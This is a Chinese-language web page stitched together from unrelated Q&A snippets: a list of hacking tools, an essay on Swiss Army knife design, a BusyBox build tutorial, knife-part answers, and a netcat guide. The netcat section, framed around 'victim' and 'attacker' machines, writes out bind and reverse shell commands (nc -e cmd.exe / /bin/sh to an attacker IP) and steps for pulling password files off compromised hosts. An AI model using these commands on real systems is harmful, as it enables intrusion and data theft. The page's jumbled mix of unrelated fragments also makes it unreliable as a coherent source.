黑客攻击别人是怎么个攻击法?
大多不是!
攻击大多用如下:
nc瑞士军刀,mt用于提权,psu.exe用于克隆帐号,
x-scan扫描弱口令,Superscan用于扫描端口,流光(综合扫描工具)
lcx端口转发
windows系统自带IPC$ telnet
还有溢出工具,比如现在的ms08067.exe针对最新微软rpc漏洞
瑞士军刀的发明是属于什么的应用
瑞士军刀厂商很低调,很少见到他们宣传自己的设计理念,我估计他们是用产品无声地诠释自己的设计理念——要用户自己领悟,用事实说话。我在把玩瑞士军刀的过程中,终于有所领悟它的设计理念,写出来与大家交流一下。
1.物尽其才,因才而用,恰到好处。瑞士军刀的用料很讲究,好刀用在刀刃上,刀刃要锋利,就用好钢材,钼铬合金钢的,既锋利耐用,又不易生锈。效果确实不错。其他的组件成分也有差别,硬度也不一样,满足不同的使用性能。隔板部分则用重量很轻的铝合金,柄材用赛璐珞,这样成本低,重量轻,方便携带。
2.组合式设计,功能多变,满足不同用户的需要。根据消费群体的不同需要,对产品进行细分,个性化设计。主刀,小刀,开瓶器,开罐器都是所有消费者需要的,属于公共部分,几乎所有的瑞士军刀都有这些配件。其他如剪刀,木锯,钢锉,钳子等则是个性化部分,不同的消费者有不同的需要,因此瑞士军刀就进行了细分,组合出了丰富多彩的不同型号的瑞士军刀。所以受到了社会各阶层的欢迎。
3.功能齐全,配件众多,符合动作节约原则。人们要修理一件物品,最怕的就是因为工具不全而耽误了宝贵的时间,有时候寻找工具所需要的时间甚至要大于修理所用的时间。而瑞士军刀恰好就解决了这个问题。一把功能齐全的瑞士军刀具有修理物品所需要的所有工具,能够让用户在最短的时间内完成修理工作,解决问题,从而节约了时间,提高了效率。
4.尺寸长短搭配,能够规避各国的刀具管制条例,让用户合法持有。瑞士军刀在设计规格上,尺寸长短搭配,有58MM,74MM,84MM,91MM,111MM等多种长度规格型号,可以根据不同国家对于管制刀具的要求,方便用户自己选择合法的瑞士军刀购买使用,从而让瑞士军刀无障碍的达到用户手中,风行天下。
由此我得出一个结论:任何世界名牌都一定有他成为名牌的理由,不会是偶然成功的。我所领悟的瑞士军刀的设计理念与瑞士人对于质量精益求精的追求,也许就是瑞士军刀成为世界名牌,而且长盛不衰的原因。
为什么360防火墙和瑞士军刀的标志一样的?
瑞士人Karl Elsener在瑞士军刀的红色握把上刻白色十字盾牌来做商标,并以母亲之名Victoria来命名这个产品,创立了Victorinox(维氏),现在市场上卖的大多是这种牌子的,另外,另一家向瑞士军方供应瑞士军刀的公司是Wenger(威戈),他的商标是长方形里面是十字。
至于360的标志,是一个十字军的盾牌标志,表示防御牛B,你可以认为有剽窃之嫌,另外,老兄你的问题蛮无聊的!
安卓 busybox 是做什么的,怎么用?
BusyBox 是一个集成了一百多个最常用linux命令和工具的软件。BusyBox 包含了一些简单的工具,例如ls、cat和echo等等,还包含了一些更大、更复杂的工具,例grep、find、mount以及telnet。有些人将 BusyBox 称为 Linux 工具里的瑞士军刀。简单的说BusyBox就好像是个大工具箱,它集成压缩了 Linux 的许多工具和命令,也包含了 Android 系统的自带的shell。
1、简介
BusyBox 将许多具有共性的小版本的UNIX工具结合到一个单一的可执行文件。这样的集合可以替代大部分常用工具比如的GNU fileutils , shellutils等工具,BusyBox提供了一个比较完善的环境,可以适用于任何小的嵌入式系统。
2、发源
BusyBox 最初是由 Bruce Perens 在 1996 年为Debian GNU/Linux安装盘编写的。其目标是在一张软盘上创建一个可引导的 GNU/Linux 系统,这可以用作安装盘和急救盘。
3、编译安装
#make
#make install
编译好后在busybox目录下生成子目录_install,里面的内容:
drwxr-xr-x 2 root root 4096 11月 24 15:28 bin
rwxrwxrwx 1 root root 11 11月 24 15:28linuxrc - bin/busybox
drwxr-xr-x 2 root root 4096 11月 24 15:28 sbin
其中可执行文件busybox在需要制作文件系统映像烧入板子的情况下,busybox应放在根文件系统目录下的bin中,其他的都是指向他的符号链接.
4、、配置
busybox的配置程序和linux内核菜单配置方式简直一模一样.熟悉用make menuconfig方式配置linux内核的朋友很容易上手.
#cp busybox-1.00.tar.gz /babylinux
#cd /babylinux
#tar xvfz busybox-1.00.tar.gz
#cd busybox-1.00
#make menuconfig
下面是需要编译进busybox的功能选项。
General Configuration应该选的选项
Show verbose applet usage messages
Runtime SUID/SGID configuration via /etc/busybox.conf
Build Options
Build BusyBox as a static binary (no shared libs)
这个选项是一定要选择的,这样才能把busybox编译成静态链接的可执行文件,运行时才独立于其他函数库.否则必需要其他库文件才能运行,在单一个linux内核不能使它正常工作.
Installation Options
Don't use /usr
这个选项也一定要选,否则make install 后busybox将安装在原系统的/usr下,这将覆盖掉系统原有的命令.选择这个选项后,make install后会在busybox目录下生成一个叫_install的目录,里面有busybox和指向它的链接.
其它选项都是一些linux基本命令选项,自己需要哪些命令就编译进去,一般用默认的就可以了,配置好后退出并保存。
5、使用技巧
可以这样用busybox
#busybox ls
他的功能就相当运行ls命令
最常用的用法是建立指向busybox的链接,不同的链接名完成不同的功能.
#ln -s busybox ls
#ln -s busybox rm
#ln -s busybox mkdir
然后分别运行这三个链接:
#./ls
#./rm
#./mkdir
就可以分别完成了ls rm 和mkdir命令的功能.虽然他们都指向同一个可执行程序busybox,但是只要链接名不同,完成的功能就不同,很多linux网站都提供busybox的源代码下载。
请教瑞士军刀的功能!!
你说的那个上面有小孔的小刀是锥子,可以在孔里穿上线,然后再用锥子扎漏你想用线穿过的东西,比如皮革啥的,这样就把线带过去了。
补充的 :
1、那两个东西就是一个镊子一个牙签
2、翻译过来就是 VICTORINOX威氏 SWITZERLAND瑞士 STAINLESS不锈钢 那个rostfrei我也不知道啥意思 嘿嘿
3、officier suisse 这个意思大概是军官刀的意思,不是型号
camping是系列 吧 野营系列 我记得刀的盒子里好像有型号 你自己看看吧
另外 不同的型号 上面的工具次序也不一样,你说在钻木塞器旁边的那个小刀 呵呵 ,别人的刀子可能不是一样的,那样就帮不了你了 。
求各种恶搞软件,不要病毒哦
######################################################################
NC这个黑客必备的武器,被称为”瑞士军刀”可见功能之强大.
对比win2000微软的telnet.exe和微软的tlntsvr.exe服务,连接的时候就可以看出来了.
1.1 NC.EXE是一个非标准的telnet客户端程序,
1.2 还有一个putty.exe客户端程序,提供四种连接模式
-raw -telnet -rlogin -ssh.
虽然现在也新出了GUI版的中文“NC”,但是相比起来还是这个好用。
######################################################################
2. Netcat 1.10 for NT 帮助信息
######################################################################
C:\WINDOWS\Desktopnc -h
[v1.10 NT]
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [options] [hostname] [port]
options:
-d detach from console, background mode (后台模式)
-e prog inbound program to exec [dangerous!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft (本帮助信息)
-i secs delay interval for lines sent, ports scanned (延迟时间)
-l listen mode, for inbound connects (监听模式,等待连接)
-L listen harder, re-listen on socket close (连接关闭后,仍然继续监听)
-n numeric-only IP addresses, no DNS (ip数字模式,非dns解析)
-o file hex dump of traffic (十六进制模式输出文件,三段)
-p port local port number (本地端口)
-r randomize local and remote ports (随机本地远程端口)
-s addr local source address (本地源地址)
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose] (-vv 更多信息)
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning] (扫描模式,-vv)
port numbers can be individual or ranges: m-n [inclusive] 3. Netcat 1.10 常用的命令格式
######################################################################
3.1.端口的刺探:
nc -vv ip port
RIVER [192.168.0.198] 19190 (?) open //显示是否开放open
3.2.扫描器
nc -vv -w 5 ip port-port port
nc -vv -z ip port-port port
这样扫描会留下大量的痕迹,系统管理员会额外小心
3.3. 后门
victim machine: //受害者的机器
nc -l -p port -e cmd.exe //win2000
nc -l -p port -e /bin/sh //unix,linux
attacker machine: //攻击者的机器.
nc ip -p port //连接victim_IP,然后得到一个shell。
3.4.反向连接
attacker machine: //一般是sql2.exe,远程溢出,webdavx3.exe攻击.
//或者wollf的反向连接.
nc -vv -l -p port
victim machine:
nc -e cmd.exe attacker ip -p port
nc -e /bin/sh attacker ip -p port
或者:
attacker machine:
nc -vv -l -p port1 /*用于输入*/
nc -vv -l -p prot2 /*用于显示*/
victim machine:
nc attacker_ip port1 cmd.exe nc attacker_ip port2
nc attacker_ip port1 /bin/sh nc attacker_ip port2
139要加参数-s(nc.exe -L -p 139 -d -e cmd.exe -s 对方机器IP)
这样就可以保证nc.exe优先于NETBIOS。 3.5.传送文件:
3.5.1 attacker machine -- victim machine //从肉鸡拖密码文件回来.
nc -d -l -p port path\filedest /*attacker machine*/ 可以shell执行
nc -vv attacker_ip port path\file.txt /*victim machine*/ 需要Ctrl+C退出
//肉鸡需要gui界面的cmd.exe里面执行(终端登陆,不如安装FTP方便).否则没有办法输入Crl+C.
3.5.2 attacker machine -- victim machine //上传命令文件到肉鸡
nc -vv -l -p port path\file.txt /*victim machine*/ 需要Ctrl+C退出
nc -d victim_ip port path\filedest /*attacker machine*/ 可以shell执行
//这样比较好.我们登陆终端.入侵其他的肉鸡.可以选择shell模式登陆.
结论: 可以传输ascii,bin文件.可以传输程序文件.
问题:连接某个ip后,传送完成后,需要发送Ctrl+C退出nc.exe .
或者只有再次连接使用pskill.exe 杀掉进程.但是是否释放传输文件打开的句柄了?
3.6 端口数据抓包.
nc -vv -w 2 -o test.txt 80 21-15
00000058 35 30 30 20 53 79 6e 74 61 78 20 65 72 72 6f 72 # 500 Syntax error
00000068 2c 20 63 6f 6d 6d 61 6e 64 20 22 22 20 75 6e 72 # , command "" unr
00000078 65 63 6f 67 6e 69 7a 65 64 2e 0d 0a # ecognized...
00000084 83 00 00 01 8f # .....
3.7 telnet,自动批处理。
nc victim_ip port path\file.cmd /*victim machine*/ 显示执行过程.
nc -vv victim_ip port path\file.cmd /*victim machine*/ 显示执行过程.
nc -d victim_ip port path\file.cmd 安静模式.
_______________file.cmd________________________
password
cd %windir%
echo []=[%windir%]
c:
cd \
md test
cd /d %windir%\system32\
net stop sksockserver
snake.exe -config port 11111
net start sksockserver
exit
2 )DameWare Mini Remote Control 是一款功能强大的windows远程控制软件。只要拥有远程主机的一个有权限的帐号,就可以控制远程主机。这个软件在中安网培有最新的汉化版()
配置方法:
配置这个很简单,我们来看一下。点击“查看”菜单中的“属性”打开“default host 属性”窗口,选择“安装选项”,点击“编辑”来配置其属性。
在“DameWare米你远程控制属性”窗口的“常规”页中,提供了三种远程登陆验证类型,对于windows98/me只能使用“proprietary challenge/response”验证机制,需要你设置好用户id和密码。至于“windows nt challenge/response”和“加密的(128-bit)windows logon”要求控制者拥有对方主机的帐户和密码。在此可以设置端口和连接超时。
0条大神的评论